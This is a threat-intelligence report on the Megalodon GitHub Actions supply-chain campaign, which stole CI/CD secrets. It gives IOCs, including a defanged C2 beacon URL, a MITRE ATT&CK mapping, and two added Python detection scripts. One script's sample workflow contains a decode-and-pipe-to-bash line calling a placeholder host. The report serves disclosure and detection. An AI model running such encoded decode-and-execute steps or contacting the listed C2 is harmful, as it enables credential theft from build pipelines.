Megalodon Malware Found in 2,800+ GitHub Files Through Malicious GitHub Actions Workflows

Executive Summary:

A large-scale software supply chain campaign dubbed Megalodon leveraged malicious GitHub Actions workflow modifications to steal sensitive credentials from affected repositories. Analysis revealed credential harvesting capabilities targeting GitHub tokens, cloud credentials, API keys, database secrets, and private keys.

The attack abused trusted CI/CD workflows by embedding obfuscated payloads that executed during automated build processes. Investigation uncovered evidence of external command-and-control (C2) communication and large-scale distribution of similar malicious payloads across thousands of GitHub repositories, highlighting the growing risk posed by CI/CD pipeline compromises within the open-source ecosystem.

Organizations relying on GitHub Actions and automated software delivery pipelines should carefully review workflow changes, monitor credential exposure, and strengthen repository security controls to mitigate similar threats.

Campaign Overview

Category | Details
--- | ---
Threat Name | Megalodon
Attack Type | Software Supply Chain Attack
Initial Access | Malicious GitHub Workflow Modification
Primary Objective | Credential Theft
Targeted Assets | GitHub Tokens, AWS Credentials, API Keys, Database Secrets, SSH Keys
Potential Impact | Repository Takeover, CI/CD Compromise, Cloud Account Access, Supply Chain Risk


Initial Repository Identification:

The investigation began after identifying suspicious modifications within GitHub Actions workflow files associated with the Tiledesk-server repository, specifically version v2.18.12.

The workflow modifications appeared unusual compared to previous commits and raised concerns regarding the introduction of unauthorized code execution within the CI/CD process. Identifying the affected version was critical for tracing the origin of the malicious activity and understanding the potential impact on developers and downstream users.

Figure 1: Repository view of the Tiledesk-server project showing version v2.18.12 used in the investigation.

Public Discovery:

The campaign gained public attention after researchers reported a suspicious commit and unusual GitHub Actions workflow modifications through a GitHub issue.

Initial findings suggested that the modified workflow executed an encoded payload capable of collecting sensitive information from repository environments. The public disclosure triggered further investigation into the workflow contents and the broader scope of the campaign.

Figure 2: GitHub issue reporting a potentially malicious commit and suspicious GitHub Actions workflow modifications.

Technical Analysis:

The technical investigation focused on understanding how the malicious workflow operated, how payloads were executed, the credential harvesting mechanisms employed, and the broader impact across affected repositories.

Workflow Modification Analysis

Analysis revealed modifications within GitHub Actions workflow files designed to execute attacker-controlled commands during automated build and deployment processes.

GitHub Actions runners often have access to sensitive repository secrets, cloud credentials, deployment tokens, and environment variables. By inserting malicious logic into trusted workflows, attackers can execute code within privileged environments and collect valuable credentials without requiring direct access to target systems.

This technique demonstrates the increasing attractiveness of CI/CD pipelines as a target for supply chain attacks.

Base64 Payload Analysis

During workflow review, investigators identified a suspicious Base64-encoded payload embedded within the execution commands.

Encoding techniques are frequently used by threat actors to conceal malicious functionality and evade detection during routine code reviews. Decoding the payload revealed additional scripts responsible for environment enumeration, credential collection, and external communications.

Figure 3: Suspicious Base64-encoded payload identified in the GitHub Actions workflow file during the initial analysis.
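As an added example (not part of the original analysis or of the Tiledesk project), the following Python scanner applies the review logic described above to a workflow file: it flags steps that decode and execute encoded content, decodes any long Base64 run it finds, and surfaces URLs or IP addresses inside the decoded text. The sample workflow and its encoded string are constructed for this example and point at TEST-NET-3 address space; they do not reproduce the Megalodon payload.

```python
import base64
import re

# Step text that decodes and runs encoded content (Bash and PowerShell forms).
EXEC_PATTERNS = [
    ("base64 decode", re.compile(r"base64\s+(?:-d|--decode)\b")),
    ("powershell encoded", re.compile(r"FromBase64String|-[eE]ncodedCommand")),
]
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")  # rare in hand-written steps
NET_IOC = re.compile(r"https?://[^\s\"']+|\b(?:\d{1,3}\.){3}\d{1,3}\b")


def try_decode(token):
    """Return decoded text if token is base64 of printable text, else None."""
    try:
        raw = base64.b64decode(token, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    if not raw.isascii():
        return None
    text = raw.decode("ascii")
    return text if all(c.isprintable() or c in "\n\r\t" for c in text) else None


def scan_workflow(text):
    """Flag lines that decode/execute encoded content or carry long base64
    runs; decode the runs and extract any network indicators they contain."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        reasons = [label for label, rx in EXEC_PATTERNS if rx.search(line)]
        decoded = [d for d in map(try_decode, B64_RUN.findall(line)) if d]
        if reasons or decoded:
            iocs = sorted({m for d in decoded for m in NET_IOC.findall(d)})
            findings.append({"line": lineno, "reasons": reasons,
                             "decoded": decoded, "indicators": iocs})
    return findings


# Constructed sample, not the Megalodon payload: one normal step plus one that
# decodes and runs an embedded string (base64 of a harmless curl to TEST-NET-3).
ENCODED = base64.b64encode(b"curl http://203.0.113.5:8443/?h=test").decode()
SAMPLE_WORKFLOW = f"""\
name: build
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - run: npm ci && npm test
      - run: echo "{ENCODED}" | base64 -d | bash
"""
```

Long Base64 runs that decode to non-text (binary blobs such as embedded certificates) are dropped by `try_decode`, so they do not raise a finding unless a decode-and-execute pattern sits on the same line.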

C2 Infrastructure Analysis

Further analysis of the decoded payload uncovered communication with attacker-controlled infrastructure.

The script attempted to establish outbound connections to an external server hosted at:

IP Address: 216.126.225.129

The communication contained identifiers likely used to track compromised repositories and associate stolen credentials with specific victims.

The presence of dedicated C2 infrastructure suggests a structured campaign focused on centralized collection and management of harvested data.

Figure 4: Decoded payload showing possible command-and-control (C2) server information and additional encoded content used during the attack process.

Credential Harvesting Analysis:

The decoded payload contained logic specifically designed to locate and extract sensitive credentials from CI/CD environments.

Targeted credentials included:

Credential Type | Examples
--- | ---
GitHub Secrets | GITHUB_TOKEN
AWS Credentials | AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY
Cloud Tokens | Azure and GCP Authentication Tokens
Database Secrets | MySQL, PostgreSQL Connection Credentials
Private Keys | SSH Keys and PEM Files
API Keys | Third-Party Service Tokens

This behavior strongly indicates that credential theft was the primary objective of the campaign.

Compromised credentials could subsequently be used for unauthorized repository access, cloud environment compromise, lateral movement, and additional supply chain attacks.

Figure 5: Credential harvesting patterns identified in the payload targeting sensitive information.

Affected Repository Scope Analysis:

Investigation revealed that the malicious payload was not isolated to a single repository.

GitHub-wide searches identified approximately 2,800 files containing similar malicious payload patterns, suggesting widespread distribution of the attack across multiple repositories.

The repeated presence of identical workflow modifications indicates a coordinated campaign targeting multiple repositories.

Figure 6: GitHub search results showing approximately 2.8K files containing similar payload patterns across multiple repositories.

MITRE ATT&CK Mapping:

Based on the analysis of the malicious workflow, encoded payloads, and credential harvesting activity, several techniques from the MITRE ATT&CK framework were identified. These techniques help explain the attacker behavior and methods used during the campaign.

Tactic | Technique | ID | Description
--- | --- | --- | ---
Initial Access | Supply Chain Compromise | T1195 | Attackers inserted malicious code into repositories
Execution | Command and Scripting Interpreter | T1059 | Malicious scripts executed through workflows
Defense Evasion | Obfuscated Files or Information | T1027 | Base64 encoding used to hide payload
Credential Access | Unsecured Credentials | T1552 | Credentials and secrets collected
Discovery | File and Directory Discovery | T1083 | Payload searched files and environment variables
Command and Control | Application Layer Protocol | T1071 | Communication with external server
Exfiltration | Exfiltration Over Web Service | T1567 | Data sent to attacker-controlled server

Indicators of Compromise (IOCs):

IP Address: 216.126.225.129

URL: hXXp[:]//216[.]126[.]225[.]129[:]8443?h=megalodon&l=gh_dump&id=hefs8esnhgkx
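An added example, not part of the original report: refanging the IOC URL above and classifying egress log lines against it. It assumes the `id` query parameter is the per-repository identifier mentioned in the C2 analysis, so a beacon is matched on the `h` and `l` parameters and the C2 host:port only; the log line shape and the sample lines are constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# The IOC exactly as published above (defanged); refanged at import time.
DEFANGED_URL = "hXXp[:]//216[.]126[.]225[.]129[:]8443?h=megalodon&l=gh_dump&id=hefs8esnhgkx"


def refang(ioc):
    """Undo common defanging: hXXp/hxxp -> http, [.] -> ., [:] -> :."""
    return re.sub(r"h[xX]{2}p", "http", ioc).replace("[.]", ".").replace("[:]", ":")


C2 = urlsplit(refang(DEFANGED_URL))
C2_HOST, C2_PORT = C2.hostname, C2.port
# Beacon parameters shared across victims; 'id' is assumed to be the
# per-repository identifier mentioned in the C2 analysis and is not matched.
C2_MARKERS = {"h": "megalodon", "l": "gh_dump"}

# Constructed egress log lines in an assumed '<ts> src=<ip> dst=<ip>:<port>
# url=<url>' shape; addresses other than the IOC come from TEST-NET-3.
SAMPLE_LOGS = [
    "2024-01-01T00:00:01Z src=10.0.0.5 dst=203.0.113.10:443 url=https://registry.example/pkg",
    "2024-01-01T00:00:02Z src=10.0.0.5 dst=216.126.225.129:8443 url=http://216.126.225.129:8443?h=megalodon&l=gh_dump&id=abc123",
    "2024-01-01T00:00:03Z src=10.0.0.5 dst=216.126.225.129:8443 url=http://216.126.225.129:8443/health",
]

LOG_RX = re.compile(r"dst=(\S+?):(\d+)\s+url=(\S+)")


def classify(line):
    """'c2_beacon' if the request has the Megalodon beacon shape (any id),
    'c2_host' for other traffic to the C2 host:port, else None."""
    m = LOG_RX.search(line)
    if not m:
        return None
    dst, port, url = m.group(1), int(m.group(2)), m.group(3)
    if dst != C2_HOST or port != C2_PORT:
        return None
    qs = parse_qs(urlsplit(url).query)
    hit = all(qs.get(k) == [v] for k, v in C2_MARKERS.items())
    return "c2_beacon" if hit else "c2_host"


def scan_logs(lines):
    """Return (line_index, verdict) for every line that touches the C2."""
    return [(i, v) for i, v in enumerate(map(classify, lines)) if v]
```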

Gurucul SIEM Detection Coverage

Gurucul SIEM can assist in identifying Megalodon-style supply chain attacks through:

  • Detection of unauthorized GitHub workflow modifications.
  • Monitoring abnormal CI/CD pipeline activities.
  • Correlation of secret access events with outbound network communications.
  • Detection of encoded Bash, PowerShell, and Base64 execution patterns.
  • Identification of suspicious communications between build environments and external infrastructure.
  • Behavioral analytics to identify anomalous credential access and potential exfiltration activity.

Impact Assessment:

Successful exploitation may result in:

Risk | Description
--- | ---
Credential Theft | Exposure of sensitive tokens and secrets
Source Code Exposure | Unauthorized repository access
Cloud Compromise | Access to cloud infrastructure
CI/CD Compromise | Manipulation of build and deployment pipelines
Lateral Movement | Use of stolen credentials across environments
Supply Chain Impact | Propagation to downstream users and projects

Conclusion:

The Megalodon campaign demonstrates how threat actors increasingly target CI/CD environments and software supply chains to obtain high-value credentials at scale.

By abusing trusted GitHub Actions workflows and embedding obfuscated payloads within automated processes, attackers can compromise repositories while remaining difficult to detect through routine code reviews.

As software supply chain attacks continue to evolve, continuous monitoring of CI/CD environments has become a critical component of modern cybersecurity programs.